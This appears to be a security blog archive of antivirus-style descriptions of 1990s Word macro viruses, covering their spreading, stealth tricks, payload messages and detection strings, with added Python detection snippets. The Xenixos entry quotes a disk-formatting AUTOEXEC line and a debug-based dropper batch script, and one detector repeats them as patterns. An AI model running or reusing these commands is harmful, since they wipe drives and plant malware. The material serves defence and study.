Prevent Online Threats

Archive for July, 2007

Macro.Word97.Afet

Thursday, July 26th, 2007

Details
Macro.Word97.Afeto

This is an Internet worm that spreads through e-mail by using Microsoft Outlook. The worm is a Word macro program written in VBA (the macro language for Microsoft Office).
When an infected document is opened, the worm macro gains control, scans all local drives and looks for a JPG file less than 50,000 bytes in size. The first file found is then inserted into the active document (the current infected document). The worm then creates new messages and sends them. New messages are created for the first eight messages in the MS Outlook “Sent items” folder. The messages are created according to the following rules:
as the address in the “To:” field, the worm sets the address from a message in the “Sent items” folder
as the subject and body of the message, it sets the subject and body from the next message in the “Sent items” folder
the active document with the worm body is attached to the message
For example, the “Sent Items” folder contains the following messages:
Message 1
To: name1@domen1.com
Subject: Hello!
Text: Do you remember me?
Message 2
To: address2@host2.com
Subject: Good bye.
Text: Today I’m leaving…
Message 3
To: nick3@server3.com
Subject: News.
Text: Great news. …
Outgoing messages (in folder “Outbox”) with a worm will appear in the following way:
Message 1
To: name1@domen1.com
Subject: Good bye.
Text: Today I’m leaving…
Message 2
To: address2@host2.com
Subject: News.
Text: Great news.
Message 3
To: nick3@server3.com
etc.

Attach: Infected document

An infected document contains the JPEG file that was selected by the worm as well as the worm macro program.
In this way, the worm sends an infected message to the first eight recipients whose addresses were found in the “Sent items” folder. Because each recipient receives the subject and body of a message that was written to someone else, the worm in many instances also breaches confidential correspondence.
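A detection heuristic for the pairing rule described above, as an added example that is not part of the original page: it flags queued messages that are addressed like one Sent Items message but carry the subject and body of the next one, plus an attachment. The `Msg` type, the function name and the attachment file names are assumptions; the sample data is constructed from the example in this entry.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Msg:
    to: str
    subject: str
    body: str
    attachments: tuple = ()

def _norm(s):
    # Compare case-insensitively and ignore whitespace differences.
    return " ".join(s.lower().split())

def find_shifted_pairs(sent, outbox, window=8):
    """Return (outbox_index, sent_index) for every queued message that is
    addressed like Sent Items message i, carries the subject and body of
    message i+1, and has an attachment."""
    hits = []
    recent = sent[:window + 1]  # pairs (i, i+1) for the first `window` items
    for o_idx, out in enumerate(outbox):
        if not out.attachments:
            continue
        for i in range(len(recent) - 1):
            src, nxt = recent[i], recent[i + 1]
            if _norm(out.to) != _norm(src.to):
                continue
            shifted = (_norm(out.subject), _norm(out.body)) == (_norm(nxt.subject), _norm(nxt.body))
            # Skip pairs whose two source messages already had identical text.
            same_text = (_norm(src.subject), _norm(src.body)) == (_norm(nxt.subject), _norm(nxt.body))
            if shifted and not same_text:
                hits.append((o_idx, i))
                break
    return hits

# Constructed sample data mirroring the example in this entry.
SENT = [
    Msg("name1@domen1.com", "Hello!", "Do you remember me?"),
    Msg("address2@host2.com", "Good bye.", "Today I'm leaving..."),
    Msg("nick3@server3.com", "News.", "Great news. ..."),
]
OUTBOX = [
    Msg("name1@domen1.com", "Good bye.", "Today I'm leaving...", ("report.doc",)),
    Msg("address2@host2.com", "News.", "Great news. ...", ("report.doc",)),
    Msg("nick3@server3.com", "Re: News.", "Thanks!", ("photo.jpg",)),  # benign reply
]

if __name__ == "__main__":
    print(find_shifted_pairs(SENT, OUTBOX))
```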

Macro.Word97. Appder, Cap, Concept, Czech, Muck,

Thursday, July 26th, 2007

Details
Macro.Word97. Appder, Cap, Concept, Czech, Muck, W

These viruses were converted from their MS Word 6/7 prototypes, and as a result they have the same set of macros, functions, features and effects. See “Macro Word viruses” for more details.
Macro.Word97.Agent
This Word97 virus was converted from its Word prototype.
Macro.Word97.Appder
This Word97 virus was converted from its Word prototype.
Macro.Word97.Atom
This Word97 virus was converted from its Word prototype.
Macro.Word97.Blash
This Word97 virus was converted from its Word prototype.
Macro.Word97.Cap
This Word97 virus was converted from its Word prototype.
Macro.Word97.Concept
This Word97 virus was converted from its Word prototype.
Macro.Word97.Czech
This Word97 virus was converted from its Word prototype.
Macro.Word97.KillDll
This Word97 virus was converted from its Word prototype.
Macro.Word97.Monkey
This Word97 virus was converted from its Word prototype.
Macro.Word97.Muck
This Word97 virus was converted from its Word prototype.
Macro.Word97.Ramses
This Word97 virus was converted from its Word prototype.
Macro.Word97.Timer
This Word97 virus was converted from its Word prototype.
Macro.Word97.Wazzu
This Word97 virus was converted from its Word prototype.

Macro.Word.Zoolo

Thursday, July 26th, 2007

Details
Macro.Word.Zoolog

This macro virus contains one macro, AutoOpen, and replicates when documents are opened. The virus deletes all macros in the global macros area (NORMAL.DOT). It writes the line “beep=ZOOlog” to the Windows WIN.INI file and detects its presence in the system by reading this string. The virus recognizes already infected documents by the “Document Author” string, “ZOOlog”.

Macro.Word.ZM

Thursday, July 26th, 2007

Details
Macro.Word.ZMB

This is a German Word macro virus. It contains four macros: AutoOpen (NORMAL.DOT - ZMB), ExtrasMakro, DateiDrucken, DateiSpeichern.
The virus infects the global macros area (NORMAL.DOT) on opening an infected document (AutoOpen) and writes itself to documents that are saved (DateiSpeichern).
This is a stealth virus: it replaces the Extras/Makro (Tools/Macro) menu with another one. Depending on the system random counter, the virus replaces words while documents are being printed.
On March 31st it erases the CONFIG.SYS, AUTOEXEC.BAT files and displays the MessageBox:
Osterhasenpolizei
Hallihalloall.
Ich bin der Osterhase und sage Dir, dax man
an Ostern keinen Computer benutzen soll !!

Macro.Word.Zer

Wednesday, July 25th, 2007

Details
Macro.Word.Zero

This is an encrypted German Word specific macro virus. It contains nine macros:
dateischließen, dokumentschließen, dok, dsu, wrd, extrasmakro,
dateispeichern, dateidokvorlagen, dateispeichernunter

In June it displays the MessageBox with the text:
Lisa, ich liebe dich!

Macro.Word.Zashi

Wednesday, July 25th, 2007

Details
Macro.Word.Zashib

This virus contains four macros: AutoOpen, Knell, Mutagen (Normal:FileOpen), Zashib (Normal:FilePrint). It infects the global macros area on opening an infected document (AutoOpen); documents are also infected on opening. When a document is printed at 16:xx, the virus appends a text in Russian to the end of the document.

Macro.Word.Xenixo

Wednesday, July 25th, 2007

Details
Macro.Word.Xenixos

This is an encrypted virus. It contains the macros:
Drop, Dummy, AutoExec, AutoOpen, DateiÖffnen, ExtrasMakro, DateiBeenden,
DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard.

In some cases it sets the password “xenixos” for infected documents, displays the message:
Diese Option ist derzeit leider nicht verfügbar.
Fehler

While printing the documents it appends:
Brought to you by the Nemesis Corporation, L1996

On the 1st of May the virus writes the following string to the AUTOEXEC.BAT file:
@echo j|format c: /u >nul

This virus also launches the “Neurobasher.b” multipartite virus. To do that, the virus creates the C:\DOS\SCRIPT.SCR file and writes a hexadecimal dump of that virus into it. Then the virus creates the C:\DOS\EXEC.BAT file and writes the following strings into it:
@echo off
debug < script.scr>nul
rem debugger.com
echo @c:\dos\debugger.exe>>c:\autoexec.bat
del c:\dos\script.scr
del c:\dos\exec.bat

Then the virus executes that file. As a result, DEBUG.EXE creates the DEBUGGER.EXE file, and C:\AUTOEXEC.BAT has a new string at its end:
@c:\dos\debugger.exe

So the last command of AUTOEXEC.BAT launches the dropper of the “Neurobasher.b” virus.
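The file-system traces listed in this entry can be checked mechanically. The following is an added example, not part of the original page: it scans AUTOEXEC.BAT text for the two lines described above and checks a file listing for the dropped files. The function names and the sample AUTOEXEC.BAT content are constructed for illustration.

```python
import re

# Indicators taken from the description above. Matching is case-insensitive
# and whitespace-tolerant, because DOS batch processing ignores both.
AUTOEXEC_INDICATORS = {
    "format-payload": re.compile(r"^@?echo\s+j\s*\|\s*format\s+c:\s*/u\b", re.I),
    "dropper-launch": re.compile(r"^@?c:\\dos\\debugger\.exe\b", re.I),
}
DROPPED_FILES = {r"c:\dos\script.scr", r"c:\dos\exec.bat", r"c:\dos\debugger.exe"}

def scan_autoexec(text):
    """Return (line_number, indicator_name) for each matching active line."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.lower().startswith("rem "):
            continue  # commented-out lines are never executed
        for name, rx in AUTOEXEC_INDICATORS.items():
            if rx.search(line):
                findings.append((lineno, name))
    return findings

def scan_file_listing(paths):
    """Return the dropped-file paths present in a listing, normalised."""
    normalised = (p.replace("/", "\\").lower() for p in paths)
    return sorted(p for p in normalised if p in DROPPED_FILES)

# Constructed sample AUTOEXEC.BAT content.
SAMPLE_AUTOEXEC = "\n".join([
    r"@ECHO OFF",
    r"PATH C:\DOS;C:\WINDOWS",
    r"REM @echo j|format c: /u >nul",
    r"@Echo J | Format C: /U >nul",
    r"@C:\DOS\DEBUGGER.EXE",
])

if __name__ == "__main__":
    print(scan_autoexec(SAMPLE_AUTOEXEC))
    print(scan_file_listing([r"C:\DOS\DEBUGGER.EXE", r"C:\DOS\DEBUG.EXE"]))
```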

Macro.Word.Wordwor

Wednesday, July 25th, 2007

Details
Macro.Word.Wordworm

This is a dangerous Word macro virus. It contains three macros: AutoOpen, ArquivoAbrir, ArquivoSalvarComo. The virus infects the global macro area on opening an infected document (AutoOpen), and writes itself to documents when they are opened (ArquivoAbrir) or saved with a new name (ArquivoSalvarComo).
On February and April 30 the virus displays the MessageBox:
Alegria, vc sú perdeu todos os seus dados! (C) Worm _ root / 97
WordWorm Virus is fertilizing the soil of your HD (crashing lamah)!!
Copyright (c) - Worm _ root of VBB and Global Destruction Inc.
All rights reserved. H/P/C/CC .) /V/A. Brasil fev/97

The virus then formats the hard drive and inserts the text into the current document:
\|/
(oo) WordWorm
(( )) help To MicroFuck
( _ ) by
( _ ) Worm_root
( _ ) Global Destruction Inc./VBB. No fears, no lamahs. Just us!
( _ ) The brasilian phrackers revenge. Your computer nightmare came true!

Macro.Word.Wordd

Wednesday, July 25th, 2007

Details
Macro.Word.Wordde

This is a dangerous Word macro virus. It contains six macros: WordDE, AutoExec, FileOpen, FilePrint, FileSaveAs, AutoOpen (WordSU in NORMAL.DOT). It infects the system on opening an infected document (AutoOpen), and it infects documents that are opened (FileOpen) or saved with a new name (FileSaveAs).
The virus sets a macro on the system timer that shuts down Word at a randomly selected time. On printing documents the virus replaces a string in Russian with a new one. The virus creates the following section in the Windows profile (WIN.INI file):
[gay]
lox=

When the counter reaches 5, the virus erases the COMMAND.COM file.

Macro.Word.Wompi

Wednesday, July 25th, 2007

Details
Macro.Word.Wompie

This virus contains six macros: autoexec, autoopen, FileSave, FileSaveAll, one, Wompie. It infects the system macros area and documents on opening (AutoOpen) and saving (FileSave). The virus deletes menu items File/Templates and Tools/Macro. It contains commented text:
The United Hackers of Amsterdam Presents the Wombat1 or Wompie Created
by The Wombat

Macro.Word.Wmv

Tuesday, July 24th, 2007

Details
Macro.Word.Wmvh

This virus contains two macros in documents (AutoOpen, BieDEMO) and five macros in NORMAL.DOT (AutoNew, AutoOpen, AutoExec, AutoClose, BieDEMO).
It infects the global macros area on opening an infected document (AutoOpen). Documents are infected on AutoNew, AutoOpen and AutoClose.
On October 10th the virus displays the MessageBox:
BieDEMO Macro Virus by WMVH
This is a Demo of Bie’s WMVH

The virus contains the comments:
REM Bie’s Word Macro Virus Hamburger Ver.beta
REM This Macro Virus Made from Bie’s WMVH
REM Bie’s E-Mail: bie111@hotmail.com
REM 2/09/1997

Macro.Word.Williamt

Tuesday, July 24th, 2007

Details
Macro.Word.Williamto

This is an encrypted Word macro virus. It contains 16 macros: Halim, FileNew, AutoOpen, FileOpen, FileSave, FileClose, FilePrint, HelpAbout, Williamto, FileSaveAs, ToolsMacro, FormatStyle, JustifyPara, ViewToolBars, FileTemplates, ToolsCustomize.
The virus infects the global macros area (NORMAL.DOT) on opening an infected document (AutoOpen) and writes itself to documents that are opened, saved or saved with new name (FileOpen, FileSave, FileSaveAs).
This is a stealth virus: it draws its own dialog on entering the Tools/Macro menu, and on pressing any button the virus displays the MessageBox:
WordBasic Err = 7
Not enough memory

After opening a file the virus displays the message:
Williamto Virus
Williamto WordBasic Virus
Programmed by Williamto Halim
Virus Research Laboratory
Dedicated to Angelia Hadeli

On error while saving files the virus displays:
Attention!!!
Williamto Halim always lives in your computer

On closing files it displays:
File Close
Please close it later! Let’s have fun!

On July 9 it displays:
Nice Day
Happy Birthday Amgelia Hadeli by Williamto Halim

The virus also replaces the “About Microsoft Word” with:
About Microsoft Word
Williamto WordBasic Virus
Programmed by Williamto Halim
Virus Research Laboratory
Dedicated to Angelia Hadeli

On printing documents the virus erases the original text and prints its own text:
Welcome to Williamto Word Macro Virus
I’m sorry about this but your computer has been infected by
Williamto Word Macro Virus
Please beware about this!!!
This Virus will destroy your data in your disk!!!
Copyright 1997 Virus Research Labs (Jakarta/Indonesia)

While printing the virus outputs to the status line the text:
[ Welcome to Williamto Word Macro Virus - Programmed & Written by
Williamto Halim the Hackers - Virus Research Laboratory ]

On November 11th the virus formats the hard drive and displays the MessageBox:
Attention!!!
I will format your hard disk now, ha-ha-ha!

Macro.Word.Wh

Tuesday, July 24th, 2007

Details
Macro.Word.Why

This virus contains only one macro, but while infecting copies it to two macros in documents and to three macros in NORMAL.DOT:
documents: AutoOpen, makemacros
NORMAL.DOT: AutoOpen, AutoClose, makemacros

The virus infects the global macros area (NORMAL.DOT) on opening an infected file (AutoOpen), and infects documents that are opened or closed (AutoOpen, AutoClose).
The virus displays the DialogBox:
Why Why Why
Why doesn’t pepole work?
No money
No drink
No eat
No instant noodles
No lunch box

Macro.Word.Whit

Tuesday, July 24th, 2007

Details
Macro.Word.White

This Word macro-virus contains a different number of macros in documents and template. In documents, there are three macros with names selected from six variants: AutoOpen, AutoClose, FileTemplates, ToolsMacro, FileOpen, Einstein.
While infecting the system, the virus creates the infected NARMOL.DOT template in the Word start-up directory. In this template the virus copies four macros: Einstein, FileOpen, FileTemplates, Show.
The virus contains the comments:
Einsteinium v.1.1. (White Virus)
Solidarity M Forever
Medan 1997

Macro.Word.Wazz

Tuesday, July 24th, 2007

Details
Macro.Word.Wazzu

This virus contains only one macro, autoOpen. It infects files when MS Word opens them, and copies its macro to the global area (NORMAL.DOT) when MS Word opens an infected document. The virus is not encrypted and may be easily detected by scanning for the text strings:
RndWorddo
wazzu do
RndWorddRgV

After infecting a document or installing itself into the system, the virus takes a randomly selected word from the document and moves it to a randomly selected position. The virus repeats that up to three times, depending on the random counter. Then, also depending on the random counter, it inserts the string “wazzu ” at a randomly selected position within the document.
In detail: the virus has three subroutines in its macro:
MAIN - the main routine; it takes control when the autoOpen macro is executed
Payload - called by MAIN; replaces words and inserts “wazzu”
RndWord - called by Payload; sets a randomly selected position within the document

The virus modifies the document with the probabilities (p): replacing words - three times with p=1/5, inserting “wazzu” - p=1/4.
Wazzu-related viruses
The original “Wazzu” (“Wazzu.a”) virus is one of the most widespread viruses in the world. A possible reason is that this virus was placed on the Microsoft WWW site, and infected documents also were (are) distributed on several CD disks. As a result there are several dozen related viruses, and the number of such related viruses is increasing every month. Short descriptions are given below; CARO standard names are used to name the viruses (AVP detects and disinfects the majority of these viruses as “Wazzu.a”).
“Wazzu.b,i” differ from original one only by included comment:
< - - - - - - here ’s the payload

“Wazzu.c,t,ac” do not manifest themselves in any way - they have no Payload subroutine (the RndWord subroutine is present in the virus, but is never called).
“Wazzu.d,f,q,w,ad” have neither the Payload nor the RndWord subroutine. “Wazzu.f” is the shortest virus in the family - its code (binary data in the infected file) is only 318 bytes long.
“Wazzu.e,h” are encrypted variants of original “Wazzu”. “Wazzu.h” is slightly corrupted and may halt MS Word or cause an error message.
“Wazzu.g,r” are encrypted viruses. “Wazzu.g” contains EatThis subroutine instead of original Payload. With probability 1/10 these viruses display a MessageBox with the text:
Microsoft Word
This one’s for you, Bosco.

“Wazzu.k” is corrupted “Wazzu.a”.
“Wazzu.l” does not have any subroutines in its macro except MAIN. With probability 1/10 it appends the string ” wazzu!” to the end of the document.
“Wazzu.m,s” have no Payload subroutine, but call it. That will cause Word’s error message.
“Wazzu.u,aa,ad” are the same as “Wazzu.a”, but do not insert the “wazzu” string.
“Wazzu.x” does not contain any subroutines except MAIN. It contains the text:
The Meat Grinder virus - Thanks to Kermit the Frog,
and Kermit the Protocol

“Wazzu.y,z” are the same as “Wazzu.a”, but the code of these viruses is slightly modified; for example, all TAB (09h) symbols are replaced with 8 spaces in “Wazzu.y”.

